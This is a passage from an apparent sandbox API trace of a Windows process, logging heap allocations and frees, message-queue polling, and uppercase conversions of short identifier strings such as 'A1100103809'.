HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0174.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0174.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0174.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0174.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0174.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0174.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0174.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0174.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0174.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0174.656] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0174.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0174.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0174.656] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0174.657] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0174.657] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0174.657] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0174.657] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0174.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0174.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0174.658] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0174.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0174.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0174.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0174.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0174.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0174.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0174.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0174.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0174.658] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0174.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0174.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0174.659] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0174.659] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0174.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0174.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0174.660] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0174.660] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0174.660] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa80 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f68 [0174.660] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0174.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0174.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0174.661] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0174.661] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0174.661] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0174.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0174.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.662] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f68 | out: hHeap=0x2af0000) returned 1 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0174.662] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0174.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0174.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0174.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0174.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0174.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0174.663] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa50 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0174.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, 